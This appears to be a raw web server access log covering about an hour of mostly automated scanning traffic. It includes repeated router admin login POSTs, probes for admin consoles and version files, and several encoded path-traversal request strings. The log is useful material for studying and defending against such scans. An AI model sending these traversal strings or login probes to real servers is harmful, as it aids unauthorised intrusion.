45.156.128.124 - - [07/May/2025:13:49:08 +0530] "GET /partymgr/control/main HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.134.225.133 - - [07/May/2025:13:49:18 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.156.128.121 - - [07/May/2025:13:49:27 +0530] "GET /cgi-bin/main.pl HTTP/1.1" 404 213 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.123 - - [07/May/2025:13:49:27 +0530] "GET /webfig/ HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
41.175.167.23 - - [07/May/2025:13:49:51 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello-World/1.0"
45.156.128.124 - - [07/May/2025:13:49:52 +0530] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.122 - - [07/May/2025:13:49:53 +0530] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.121 - - [07/May/2025:13:49:53 +0530] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.123 - - [07/May/2025:13:49:53 +0530] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.121 - - [07/May/2025:13:49:53 +0530] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.123 - - [07/May/2025:13:50:11 +0530] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 219 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.134.225.133 - - [07/May/2025:13:50:17 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.156.128.124 - - [07/May/2025:13:50:28 +0530] "GET /aspera/faspex/ HTTP/1.1" 404 212 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.121 - - [07/May/2025:13:50:28 +0530] "GET /sugar_version.json HTTP/1.1" 404 216 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.122 - - [07/May/2025:13:50:41 +0530] "GET /license.txt HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.134.225.133 - - [07/May/2025:13:50:50 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.156.128.121 - - [07/May/2025:13:50:57 +0530] "GET /wp-json HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.124 - - [07/May/2025:13:51:11 +0530] "GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.121 - - [07/May/2025:13:51:25 +0530] "GET /console HTTP/1.1" 404 205 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.124 - - [07/May/2025:13:51:36 +0530] "GET /admin/ HTTP/1.1" 404 204 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.121 - - [07/May/2025:13:51:36 +0530] "GET /WebInterface/ HTTP/1.1" 404 211 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.134.225.133 - - [07/May/2025:13:51:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.156.128.124 - - [07/May/2025:13:51:48 +0530] "GET /favicon-32x32.png HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.128.121 - - [07/May/2025:13:51:48 +0530] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.134.225.133 - - [07/May/2025:13:52:11 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:52:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:54:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:54:12 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.218.86.4 - - [07/May/2025:13:55:58 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.134.225.133 - - [07/May/2025:13:56:12 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:56:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:56:57 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:13:57:21 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:13:57:47 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:13:59:05 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:13:59:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:13:59:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:00:44 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:14:00:51 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:01:36 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:14:02:35 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:03:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:03:11 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:04:14 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:14:04:23 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:14:04:39 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:04:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:05:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:14:06:10 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:14:07:03 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:14:07:25 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:14:07:33 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:08:25 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:08:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:14:09:38 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
185.218.86.4 - - [07/May/2025:14:09:53 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.134.225.133 - - [07/May/2025:14:10:23 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:10:48 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:14:10:49 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:11:46 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:12:00 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:13:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:13:19 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:14:13:50 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:14:14:14 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:14:14:56 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:15:36 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:15:56 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:16:50 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:18:21 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:18:23 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:14:18:45 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:14:19:10 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.142.182 - - [07/May/2025:14:19:56 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:14:20:16 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
147.185.133.109 - - [07/May/2025:14:21:03 +0530] "GET / HTTP/1.1" 200 1620 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.134.225.133 - - [07/May/2025:14:21:17 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:22:09 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:22:28 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:23:30 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:24:31 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:25:12 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:25:32 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:25:33 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
176.65.142.182 - - [07/May/2025:14:26:27 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.142.182 - - [07/May/2025:14:26:27 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.142.182 - - [07/May/2025:14:26:28 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
162.216.149.239 - - [07/May/2025:14:27:18 +0530] "GET / HTTP/1.1" 200 1620 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.134.225.133 - - [07/May/2025:14:27:46 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:28:11 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:28:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:29:38 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.218.84.178 - - [07/May/2025:14:30:06 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
58.49.233.126 - - [07/May/2025:14:30:37 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
121.4.97.180 - - [07/May/2025:14:30:37 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
45.134.225.133 - - [07/May/2025:14:30:43 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:30:58 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:14:31:59 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:14:32:13 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.34 - - [07/May/2025:14:33:02 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:14:33:17 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
154.81.156.35 - - [07/May/2025:14:33:32 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.134.225.133 - - [07/May/2025:14:33:49 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:34:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:14:34:32 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
154.81.156.35 - - [07/May/2025:14:35:39 +0530] "GET / HTTP/1.1" 200 1620 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.134.225.133 - - [07/May/2025:14:35:44 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:36:21 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:14:36:34 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
95.214.54.4 - - [07/May/2025:14:36:35 +0530] "GET / HTTP/1.1" 200 4270 "-" "Hello World/1.0"
45.134.225.133 - - [07/May/2025:14:36:45 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
161.248.238.13 - - [07/May/2025:14:37:01 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:14:37:57 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
45.134.225.133 - - [07/May/2025:14:38:01 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:39:04 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:39:19 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.107.12.18 - - [07/May/2025:14:39:33 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [07/May/2025:14:40:06 +0530] "GET / HTTP/1.1" 200 4270 "-" "-"
176.65.137.188 - - [07/May/2025:14:40:06 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "-" "Mozilla/5.0"
176.65.137.188 - - [07/May/2025:14:40:07 +0530] "POST /boaform/admin/formTracert HTTP/1.1" 404 223 "-" "Mozilla/5.0"
45.134.225.133 - - [07/May/2025:14:40:15 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.236:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.134.225.133 - - [07/May/2025:14:41:13 +0530] "POST /boaform/admin/formLogin HTTP/1.1" 404 221 "http://103.145.51.74:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
